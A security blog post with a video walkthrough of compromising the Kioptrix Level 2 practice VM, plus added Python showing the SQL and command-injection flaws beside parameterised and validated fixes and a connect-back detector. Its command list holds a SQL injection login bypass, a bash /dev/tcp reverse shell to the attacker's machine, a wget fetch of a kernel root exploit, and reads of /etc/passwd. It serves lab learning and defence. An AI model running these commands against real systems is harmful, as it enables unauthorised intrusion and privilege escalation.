
[VIDEO] Rooting A Box (Local Command Execution)

Posted in Security Videos


It's been a while since I last updated this blog (I've been working on some projects lately), but I had to steal some time out to make this.

In this session, we will be having a look at gaining root privileges using command execution.

Overview

Our target system is Kioptrix 2.

Kioptrix is a "Vulnerable-By-Design OS" which serves as a pentest lab where security enthusiasts can legally try out their skills, with the aim of completely compromising the machine.

The video describes a step-by-step way of going about this.

What Resources Do We Need?

   * Kioptrix – Level 2 VM. Download here
   * A virtualization platform (for example VMware Player or VirtualBox)
   * Nmap – (Can be found on BackTrack 5-R2). Download here
   * Firefox – (Can be found on BackTrack 5-R2)
   * Linux Kernel 2.6 Root Exploit – (Can be found on exploit-db.com)

Steps

   * Discover the network for hosts (Netdiscover)
   * Scan the target (Nmap)
   * Bypass the login screen (MySQL injection)
   * Set Netcat to listen on the attack machine
   * Inject a bash reverse shell
   * Navigate to a directory where the apache user can write files (cd /tmp)
   * Search for a local privilege escalation exploit for Linux kernel version 2.6
   * Download the exploit code and host it on the attack machine
   * Use the reverse shell to wget the exploit code onto the victim's machine
   * Compile the exploit code and execute it
   * Game Over
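The login bypass in the steps above works because the application builds its SQL query by pasting the submitted password straight into the query text. The following is an added example, not code from the original post or from Kioptrix: it stands in Python's built-in sqlite3 for the target's MySQL, uses a constructed one-user table, and shows the vulnerable string-building pattern beside its parameterised fix, fed the same `1' or '1--` value the commands section enters.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table standing in for the target's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT NOT NULL, password TEXT NOT NULL)")
    # Constructed credentials; a real application would store a salted password hash.
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query with string formatting, so quotes in the input become SQL syntax."""
    query = (
        "SELECT username FROM users WHERE username='%s' AND password='%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Parameterised query: the driver passes the values separately from the SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row is not None


# The password value from the post's command list.
BYPASS_PASSWORD = "1' or '1--"


def demo():
    """Run both login routines against the same bypass value and a genuine login."""
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "admin", BYPASS_PASSWORD),
        "safe_bypassed": login_safe(conn, "admin", BYPASS_PASSWORD),
        "safe_real_login": login_safe(conn, "admin", "correct-horse-battery"),
    }


if __name__ == "__main__":
    print(demo())
```

In the vulnerable routine the submitted value closes the password string early, so the `WHERE` clause becomes `... AND password='1' or '1--'`; the trailing `'1--'` is a non-zero literal, so the `OR` is true for every row and the first user comes back as "authenticated". The parameterised routine hands the whole value to the driver as data, and the same string simply fails to match a password.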

Commands

netdiscover -r 192.168.61.0/24
nmap 192.168.61.130 -p 1-65500 -O -sS -sV -v
clear
firefox 192.168.61.130
-> User: admin
-> Password: 1' or '1--

; cat index.php
nc -lvvp 4000
// We want a basic shell on the server, so the netcat listener on the attack machine waits on port 4000 for the connect-back
/bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0

// Using bash's /dev/tcp pseudo-device, a single command line gives us the connect-back shell
uname -a
whoami
// We are still the apache user, and the objective says we should be "root"
cat /etc/issue
firefox www.exploit-db.com
Search for "linux kernel 2.6"
Download ip_append_data() local ring0 root exploit
wget 192.168.61.128/9542.c
// Fetch the exploit code "9542.c" onto the victim's machine from the attack machine's web server
gcc 9542.c -o RootMeNow
// Compile the exploit code
./RootMeNow
cat /etc/passwd
cat /etc/passwd && whoami && uname -a
cd /var/www
cd html
ls
whoami
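The `; cat index.php` line and the `/dev/tcp` connect-back in the command list both depend on a web form that hands its input to a shell. As an added example (not part of the original post or of Kioptrix; the ping feature, the function names and the sample inputs are constructed), here is that vulnerable shell-string pattern beside an input-validation plus argv-list fix, together with a small triage function a defender can run over submitted values to flag the two patterns shown on this page.

```python
import ipaddress
import re
import subprocess

# Constructed form submissions for a "ping this host" feature. The second and
# third mirror the kinds of input the post's command list shows (a chained
# command and a bash /dev/tcp connect-back); they are samples, not captured traffic.
SAMPLE_INPUTS = [
    "192.168.61.1",
    "; cat index.php",
    "192.168.61.1; /bin/sh 0</dev/tcp/192.168.61.128/4000 1>&0 2>&0",
]

# Shell metacharacters that turn one argument into extra commands or redirections.
SHELL_META = re.compile(r"[;&|`$<>\n]")
# bash's /dev/tcp/<ip>/<port> pseudo-device is the tell-tale of the one-line connect-back.
CONNECT_BACK = re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")


def build_ping_vulnerable(host):
    """The bug: user input pasted into a shell string (as run via os.system / shell=True)."""
    return "ping -c 3 " + host


def build_ping_safe(host):
    """Accept only a syntactically valid IP address and return an argv list, else None."""
    try:
        ip = ipaddress.ip_address(host.strip())
    except ValueError:
        return None
    return ["ping", "-c", "3", str(ip)]


def run_ping(host, timeout=15):
    """Execute the validated command without a shell; the value can't become syntax."""
    argv = build_ping_safe(host)
    if argv is None:
        raise ValueError("host must be a single IPv4/IPv6 address")
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).stdout


def classify(value):
    """Triage label for a submitted value, for logging or alerting on the web tier."""
    if CONNECT_BACK.search(value):
        return "connect-back-shell"
    if SHELL_META.search(value):
        return "command-injection"
    return "clean"


def triage(values):
    """Pair each submitted value with its triage label."""
    return [(v, classify(v)) for v in values]


if __name__ == "__main__":
    for value, label in triage(SAMPLE_INPUTS):
        print(f"{label:20} {value!r}")
    print(build_ping_vulnerable(SAMPLE_INPUTS[1]))
    print(build_ping_safe(SAMPLE_INPUTS[0]))
```

The fix has two halves that matter independently: the allow-list check (`ipaddress.ip_address`) rejects anything that is not a bare address before it reaches the command, and passing an argv list to `subprocess.run` with no shell means even a value that slipped past validation is one argument to `ping`, not shell syntax. The triage labels are a starting point for web-tier alerting on the same request parameter, not a replacement for the fix.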

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

Songs

– 07 Drive It Like You Stole It (Mindelixir Remix)

– 10 A Dream Within A Dream (Skeet Skeet Remix)

Kindly use the comment box below for feedback.


– InfosecShinobi

Comments (4)

nice … 

Niceeeeeee 🙂

It would have been better if you added your voice instead of the music. The explanation is better done by your own voice.
Also, the way the video is embedded can be better. Viewing at even HD, I can't see some things you are typing. The option for full screen viewing isn't there..
Top marks for the effort anyway!..

Thanks for dropping by.

You can view it in full screen on YouTube. Just click on the "Watch On YouTube" link located at the bottom right.

Click on Change quality, select 720p HD and then finally click on Full Screen.

Also, the commands used are on this page so you can just browse through the commands and copy if you need to.

Cheers.
